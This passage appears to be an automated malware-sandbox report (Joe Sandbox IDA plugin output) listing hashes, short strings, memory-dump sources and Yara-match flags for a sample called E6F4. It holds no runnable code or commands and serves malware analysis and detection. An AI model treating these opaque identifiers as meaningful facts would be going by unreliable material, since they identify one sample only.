                                                                                                                                                                                                                                • Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                                                                                                                                                • Instruction ID: dfd93f874f74ad85c361160add1f6facb248c09b7be9ddbe8698b7e67560f952
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB81163110C3828EDB059F38C45077AFFE1AFA3318F1C99ADD4D2AB692D629C50AC752
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: #=0$Z$ut
                                                                                                                                                                                                                                • API String ID: 0-1971374411
                                                                                                                                                                                                                                • Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                                                                                                                                                • Instruction ID: eba545bab416a68370d8833e2e81319f1cd74d48ef4740c2d23370f5f56f4d51
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4681E23120C7829AD7058F39845026BBFE1AFA7314F1889AED4D1AB3C7D639C90AC756
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                • API String ID: 0-2390459867
                                                                                                                                                                                                                                • Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                                                                                                                                                • Instruction ID: 87798784d37230ccb8ad8222043734dedc1c39102cf536da6d33b556ec0a41ac
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8581D8612083818BD719CF3988A136EFFD2AFE7354F2C496DE4D18B281D279C50ACB56
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                • API String ID: 0-2390459867
                                                                                                                                                                                                                                • Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                                                                                                                                                • Instruction ID: b31d7765b50fe5da72acd4eceaa3461b1016088ded1e177ce8b27f3ca53c8b68
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E81E8602083918BD719CF3A946136BFFD29FE6314F6D496EE4D18B381D23CC5068B5A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: D`a&$H/d$NMNO
                                                                                                                                                                                                                                • API String ID: 0-3115279301
                                                                                                                                                                                                                                • Opcode ID: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
                                                                                                                                                                                                                                • Instruction ID: 3712f8b39468fd981d2a59d517f423ac08e779d88cab8977a726c23188efcc4f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 038113352083095FD714DFA8D881B6BBBA2FFC5324F29C62CE5A547391DB31A909C751
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: :;$H/d
                                                                                                                                                                                                                                • API String ID: 0-3418912194
                                                                                                                                                                                                                                • Opcode ID: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
                                                                                                                                                                                                                                • Instruction ID: e94d9eaf06972e4eab62bbe6b6f194d86a67931d53ce048809dc631822e1739c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AFA1C271A053119BD710AF28CC8376FBBA1FF82724F18892CF8959B281E779ED458752
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: :;$H/d
                                                                                                                                                                                                                                • API String ID: 0-3418912194
                                                                                                                                                                                                                                • Opcode ID: 303de10fff242c4ff705677ea5eca08dca5e362961479335f7d5ab6b711b2e43
                                                                                                                                                                                                                                • Instruction ID: a8ce0ab78c4be7f089376efb71ad2075c1d737e56b9c5b96f1916c659004ebff
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 303de10fff242c4ff705677ea5eca08dca5e362961479335f7d5ab6b711b2e43
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FCA11972605320ABD7109F24ED8276B73E0EF85358F88852EF8959B391E3BCDD05875A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: H/d$NP,?
                                                                                                                                                                                                                                • API String ID: 0-2578173153
                                                                                                                                                                                                                                • Opcode ID: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
                                                                                                                                                                                                                                • Instruction ID: 5e067feac84a507e0a4b8dc5b40d3cbd7550b63a4cadcacacc4245e3f77e16e9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6A11571A043209BD724CF28C882BBFBFA6BBC5724F18862CE59957291D730BC018799
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: H/d$NP,?
                                                                                                                                                                                                                                • API String ID: 0-2578173153
                                                                                                                                                                                                                                • Opcode ID: 4292c81706fc5104aea80fe8ef179a1662a25d3dca60aede90bca8e2f2b4382c
                                                                                                                                                                                                                                • Instruction ID: f65ccde577a60585fc50111e68a200c88a0f1f1b3df19762a23bd62bb81c5e5c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4292c81706fc5104aea80fe8ef179a1662a25d3dca60aede90bca8e2f2b4382c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5DA18E75A083209BD324DF19CCC173BB3A6EBC9324F19962EE995673D1D738AC018799
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: H/d$_\]R
                                                                                                                                                                                                                                • API String ID: 0-2100514861
                                                                                                                                                                                                                                • Opcode ID: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
                                                                                                                                                                                                                                • Instruction ID: 7bfbca3e719db76f8dd7381e9b0ec9fc28395dedcdc78407902fa6b8b97fbcf3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 019117315083529FCB18DF68C890A6FBBE2FFD9314F19852CE4C597291E7319945C786
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID: H/d$_\]R
                                                                                                                                                                                                                                • API String ID: 2994545307-2100514861
                                                                                                                                                                                                                                • Opcode ID: 40b2a5fcce8fbd99e35ebddbeea2a32485a095c58c85b1bcf33869944168392c
                                                                                                                                                                                                                                • Instruction ID: 67d2bc21efa779ec1b2302c596d4d55850990720b38256b1c81cc65d81c9891d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40b2a5fcce8fbd99e35ebddbeea2a32485a095c58c85b1bcf33869944168392c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 729114315083119BD718DF28D9A0A2FB7E2EFD9314F59862DF48697391E774E802C78A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: o~$yr
                                                                                                                                                                                                                                • API String ID: 0-1013308823
                                                                                                                                                                                                                                • Opcode ID: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
                                                                                                                                                                                                                                • Instruction ID: 3cbe320c2b455a89266940e1424f13c5760847fba04a2d46fa52403223887536
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B91127690C3548BD320DF18C844A6BBBE2FFD6324F09892CE9D95B391E7B48905C786
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: o~$yr
                                                                                                                                                                                                                                • API String ID: 0-1013308823
                                                                                                                                                                                                                                • Opcode ID: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
                                                                                                                                                                                                                                • Instruction ID: 9949b5826033667454bdd212c251d03fc0b1eef30724b4879d74d6325ed2a79f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48913975A0C3208BD320DF19D84066BBBE2EFD5324F09892DE9D95B391E7B8C905C786
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: =^"\$H/d
                                                                                                                                                                                                                                • API String ID: 0-3063805157
                                                                                                                                                                                                                                • Opcode ID: 30c79af13426789e40e09411e713427a5fad7c453bf973c8dd38d9b25f6a572f
                                                                                                                                                                                                                                • Instruction ID: 31f6d952e69ddc92c57c3d15082e8394249c76af6de0d574896d183d93ceef01
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30c79af13426789e40e09411e713427a5fad7c453bf973c8dd38d9b25f6a572f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4281DE383052019BE724DF1CD990A2BB3E2EF89314F54866DF9858B3A0DB35EC51CB0A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: :7$%$:7$%
                                                                                                                                                                                                                                • API String ID: 0-2391988857
                                                                                                                                                                                                                                • Opcode ID: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
                                                                                                                                                                                                                                • Instruction ID: 5277f9c07afe33804571d891b85cfb1d8e7da6fb33f88fad68ce5a8b8f244c56
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6921B3B15083908BD7089F79C965B6FFBE5BBD6318F145A2CE1D287291DBB4C405CB82
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: :7$%$:7$%
                                                                                                                                                                                                                                • API String ID: 0-2391988857
                                                                                                                                                                                                                                • Opcode ID: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
                                                                                                                                                                                                                                • Instruction ID: 0de6392d9aeb990522659998ecc2397938767f988235b0ae13ec08bed24327b9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA21F1701093908BD7089B69C865B6FFBE4AB86318F105A2DE1D2872D1DBB48809CB82
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: H/d$
                                                                                                                                                                                                                                • API String ID: 0-1124206264
                                                                                                                                                                                                                                • Opcode ID: 59ebb6f1c1a99dc460b157ce1b0bc87d6a21890c15c4f19892189c2b52108220
                                                                                                                                                                                                                                • Instruction ID: b4d6be4d1f4379cb9fd0a2be5fe7cdcb7fa831499067cbe57a1e1484a7f93e84
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59ebb6f1c1a99dc460b157ce1b0bc87d6a21890c15c4f19892189c2b52108220
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A11C471718240AFDB648F64CD8677B77E6BBD2324F28863CD1A4972D1DB74D8418B05
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: MO$MO
                                                                                                                                                                                                                                • API String ID: 0-3148518880
                                                                                                                                                                                                                                • Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                                                                                                                                                • Instruction ID: 9d1b40bd57a3cb92af42906456a52a71adb56aa5d18d28c19a42e6b1ecd82608
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2117C741442918BEF148FA8DD95667BFA0EF46320F2499D9DC856F38BC638C902CF65
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 7&'$$vA\
                                                                                                                                                                                                                                • API String ID: 0-2621209329
                                                                                                                                                                                                                                • Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                                                                                                                                                                                • Instruction ID: 302742b2cd7d78bfdd0a0f95ec5f12ee5645445ecf2e272e62ee68359ffa8fa9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35F068345145948BDB918F7C98996BE67F0F753214F302AB9C65AE32E2C635C8928F08
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 7&'$$vA\
                                                                                                                                                                                                                                • API String ID: 0-2621209329
                                                                                                                                                                                                                                • Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                                                                                                                                                                                • Instruction ID: 095e66cfb836127910944c44464487434cf5069dbd9256ca3ed79a62a3e9a21d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02F09C745145544BEB918F7C98996BF67F0F713214F302BB5C65AE32A2C634C8914F0C
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00597E61
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 237503144-0
                                                                                                                                                                                                                                • Opcode ID: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
                                                                                                                                                                                                                                • Instruction ID: daba30f693b64e01b145e3e3a175781b998baa00beccf2408f7eb4b5da3b5dbd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79B113729183218BC714CF28C4917AABBF2FFD9314F19962DE4C95B254E7389D02C796
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: H/d
                                                                                                                                                                                                                                • API String ID: 0-3641415750
                                                                                                                                                                                                                                • Opcode ID: f0af6f60d34b4f0c8cbc000c65ea523940a6645594962f293f067da5df6a1c82
                                                                                                                                                                                                                                • Instruction ID: d2e23a67c1903cd1e9c185385271eb72bcb916f6a4fd91b19e1fe5de6aa7faac
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0af6f60d34b4f0c8cbc000c65ea523940a6645594962f293f067da5df6a1c82
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B122775B00226CBDB14CF68D8917AFB7B2FF8A300F5980A9C441AB3A5D7399D42DB54
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ''
                                                                                                                                                                                                                                • API String ID: 0-694448769
                                                                                                                                                                                                                                • Opcode ID: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
                                                                                                                                                                                                                                • Instruction ID: 38a666b728407e983ea3bf44eb191d82df5ecff9bb8f67a4afff68b973ae6b10
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 469101B56183108BCB148F28C8A166BBBE2FFD1364F18D92CE8D58B790E774D905C792
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ''
                                                                                                                                                                                                                                • API String ID: 0-694448769
                                                                                                                                                                                                                                • Opcode ID: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
                                                                                                                                                                                                                                • Instruction ID: 51f56407e220038c845c571476400c53c6676d21aaa49407b98741bf0e440936
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 589124756483108BC3148F28CC912ABB7E2EFD5354F18D92DE8D58B391E778C945C79A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: *+
                                                                                                                                                                                                                                • API String ID: 0-2181965719
                                                                                                                                                                                                                                • Opcode ID: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
                                                                                                                                                                                                                                • Instruction ID: a6a176cfa994aee3612649f895d437fda5b17e7ce8ddb12fb8ae0738439bb6c9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0BB177B15093818BD7318F25C8917EBBBF1EF96314F18892DD4C98B391EB384446CB8A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
